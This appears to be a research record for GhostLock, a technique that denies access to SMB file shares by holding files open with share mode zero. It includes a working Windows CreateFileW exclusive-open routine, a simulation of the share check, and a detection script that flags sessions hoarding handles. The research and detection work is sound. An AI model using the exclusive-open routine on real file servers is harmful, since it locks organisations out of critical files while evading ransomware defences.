GhostLock: SMB Deny-Share Handles as a Zero-Privilege Availability Weapon
Description
Traditional ransomware disrupts organizations by encrypting data and demanding payment for the decryption key. This paper presents a different kind of availability attack that produces the same business disruption without writing a single encrypted byte to disk.
By calling the Windows API CreateFileW with dwShareMode set to zero (FILE_SHARE_NONE), a low-privileged domain user with ordinary read access to a corporate SMB file share can hold files open in an exclusive state for as long as the SMB session lives. Share modes are enforced by the file server on the opener's behalf, so every later open of that file from any client, whether for read, write or delete, fails with a sharing violation. The one precondition is that nobody else has the file open at the moment the attacker opens it; otherwise the attacker's share-nothing open is the one that is refused. From the victim's perspective the result matches ransomware: critical files become inaccessible, ERP and workflow systems that depend on them fail, and recovery requires an administrator on the file server to identify and close the offending handles or session.
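The share-mode check described above, as an added example that is not GhostLock's own code. The first part is a pure-Python model of the check Windows applies on every CreateFile (the new request's desired access is tested against each existing handle's share mode, and the new share mode against each existing handle's access; either mismatch is a sharing violation), used to show why one FILE_SHARE_NONE handle blocks every later open and why the attacker's open fails if the file is already in use. The second part is the real call through ctypes and only runs on Windows. The UNC path, user labels and the `Open` record are this example's assumptions.

```python
"""Added example, not GhostLock's own code: what a dwShareMode=0 open does.

Part 1 models the share-access check Windows applies on every CreateFile.
Part 2 is the real CreateFileW call through ctypes and only runs on Windows.
"""
import sys
from dataclasses import dataclass

# Win32 constants, values as in the SDK headers.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
DELETE = 0x00010000
FILE_SHARE_NONE = 0x0
FILE_SHARE_READ = 0x1
FILE_SHARE_WRITE = 0x2
FILE_SHARE_DELETE = 0x4
OPEN_EXISTING = 3


@dataclass(frozen=True)
class Open:
    owner: str   # label only, for the demo (assumption, not a Win32 field)
    access: int  # GENERIC_READ | GENERIC_WRITE | DELETE bits actually requested
    share: int   # FILE_SHARE_* bits this opener is willing to grant to others


def share_bits_needed(access: int) -> int:
    """FILE_SHARE_* bits another handle must grant for this access mask."""
    bits = 0
    if access & GENERIC_READ:
        bits |= FILE_SHARE_READ
    if access & GENERIC_WRITE:
        bits |= FILE_SHARE_WRITE
    if access & DELETE:
        bits |= FILE_SHARE_DELETE
    return bits


def share_check(existing: list, new: Open) -> bool:
    """True if `new` may be opened alongside the `existing` live handles."""
    need = share_bits_needed(new.access)
    for cur in existing:
        if need & ~cur.share:                           # they do not share what we need
            return False
        if share_bits_needed(cur.access) & ~new.share:  # we do not share what they hold
            return False
    return True


def try_open(table: dict, path: str, o: Open) -> bool:
    """Simulate CreateFile against a per-path table of live handles."""
    live = table.setdefault(path, [])
    if not share_check(live, o):
        return False
    live.append(o)
    return True


def demo_scenario():
    """Open outcomes for a constructed UNC path, in the order attempted."""
    victim = r"\\fileserver\finance\ledger.xlsx"
    t = {}
    attacker_first = try_open(t, victim, Open("attacker", GENERIC_READ, FILE_SHARE_NONE))
    excel_after = try_open(t, victim, Open("clerk", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ))
    backup_after = try_open(t, victim, Open("backup", GENERIC_READ,
                                            FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE))
    # Caveat: the lock only lands on files nobody has open yet. If the clerk
    # is already editing, the attacker's share-nothing open is the one refused.
    t2 = {}
    clerk_first = try_open(t2, victim, Open("clerk", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ))
    attacker_after = try_open(t2, victim, Open("attacker", GENERIC_READ, FILE_SHARE_NONE))
    return attacker_first, excel_after, backup_after, clerk_first, attacker_after


def win32_exclusive_open(path: str):
    """Real CreateFileW with dwShareMode=0. Windows only. Returns the raw
    handle as an int (keep it; CloseHandle releases the lock) or None."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
                                wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
                                wintypes.HANDLE]
    k32.CreateFileW.restype = wintypes.HANDLE
    h = k32.CreateFileW(path, GENERIC_READ, FILE_SHARE_NONE, None, OPEN_EXISTING, 0, None)
    invalid = ctypes.c_void_p(-1).value  # INVALID_HANDLE_VALUE
    if h is None or h == invalid:
        return None  # GetLastError() == 32 is ERROR_SHARING_VIOLATION: someone got there first
    return h


if __name__ == "__main__":
    print(demo_scenario())  # (True, False, False, True, False)
    if sys.platform == "win32" and len(sys.argv) > 1:
        print("held" if win32_exclusive_open(sys.argv[1]) else "refused")
```

The model makes the race visible: the attacker wins only on files that are idle at the instant of the open, which is why the technique targets whole share trees rather than the one document somebody is editing, and why the handle must be kept alive for the denial to persist.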
The difference is what the attack does not produce. No writes. No renames. No new file extensions. No encryption overhead. No C2 infrastructure. Behavioral ransomware defenses that key on bulk writes, renames, entropy changes or canary-file modification see nothing, because nothing on disk changes. The only reliable detection signal sits inside the file server itself, in its own view of which sessions hold how many open handles, a metric that virtually no enterprise SIEM currently ingests.
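The server-side check a defender would run, as an added example that is not from the GhostLock whitepaper. It consumes a CSV in the shape of `Get-SmbOpenFile | Export-Csv -NoTypeInformation opens.csv` taken on the file server and flags sessions that hold an abnormal number of open files. The sample rows are constructed, the column set is a subset of what that export emits, and the choice of signal (open handles per session and that session's share of all handles on the server) and the thresholds are this example's assumptions, not the whitepaper's.

```python
"""Added example, not from the GhostLock whitepaper: flag handle hoarding in
a file server's own open-file table.

Input is a CSV in the shape of
    Get-SmbOpenFile | Export-Csv -NoTypeInformation opens.csv
run on the file server itself. Rows below are constructed.
"""
import csv
import io
from collections import defaultdict

HEADER = "FileId,SessionId,Path,ClientComputerName,ClientUserName,Permissions"


def _row(fid, sid, path, host, user, perm="1179785"):
    # perm 1179785 == 0x120089 == FILE_GENERIC_READ; constructed value
    return f"{fid},{sid},{path},{host},{user},{perm}"


def build_sample_csv() -> str:
    """Two ordinary sessions plus one that has pinned 120 finance files."""
    lines = [HEADER,
             _row(1, 4001, "F:\\shares\\finance\\budget.xlsx", "WS-017", "CORP\\asmith"),
             _row(2, 4001, "F:\\shares\\finance\\notes.docx", "WS-017", "CORP\\asmith"),
             _row(3, 4002, "F:\\shares\\hr\\handbook.pdf", "WS-042", "CORP\\bjones")]
    for i in range(120):
        path = "F:\\shares\\finance\\%d\\inv_%04d.pdf" % (2019 + i % 6, i)
        lines.append(_row(100 + i, 4077, path, "WS-099", "CORP\\jdoe"))
    return "\n".join(lines) + "\n"


def parse_open_files(text: str) -> list:
    return list(csv.DictReader(io.StringIO(text)))


def handles_per_session(rows: list) -> dict:
    """Group open-file paths by (SessionId, user, client host)."""
    by = defaultdict(list)
    for r in rows:
        by[(r["SessionId"], r["ClientUserName"], r["ClientComputerName"])].append(r["Path"])
    return by


def find_hoarders(rows: list, min_handles: int = 50, min_share: float = 0.5) -> list:
    """Sessions holding >= min_handles open files OR >= min_share of every
    open handle on this server. Thresholds are assumptions; baseline them
    against a quiet day on your own server before alerting on them."""
    total = len(rows)
    alerts = []
    for (sid, user, host), paths in handles_per_session(rows).items():
        n = len(paths)
        share = n / total if total else 0.0
        if n >= min_handles or share >= min_share:
            alerts.append({
                "SessionId": sid, "user": user, "host": host,
                "open_files": n, "share_of_server": round(share, 2),
                "distinct_dirs": len({p.rsplit("\\", 1)[0] for p in paths}),
            })
    return sorted(alerts, key=lambda a: -a["open_files"])


if __name__ == "__main__":
    for a in find_hoarders(parse_open_files(build_sample_csv())):
        print(a)
```

Once a session is identified, `Close-SmbOpenFile -SessionId <id> -Force` or `Close-SmbSession -SessionId <id> -Force` on the server releases the handles, but the client can reopen them the moment the session is cut, so the account or host has to be blocked at the same time.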
No CVE. No patch. This is documented Windows behavior, working exactly as designed for 30 years. The GhostLock tool demonstrates the technique; it was developed and tested under explicit written authorization during an authorized red team engagement.
Files

| Name | Size | MD5 |
|---|---|---|
| ghostlock_whitepaper.pdf | 54.3 kB | c64df435515814f83cf09fd7b2463b32 |
Additional details

Software

- Repository URL: https://github.com/kimd155/ghostlock
- Programming language: Python
- Development Status: Active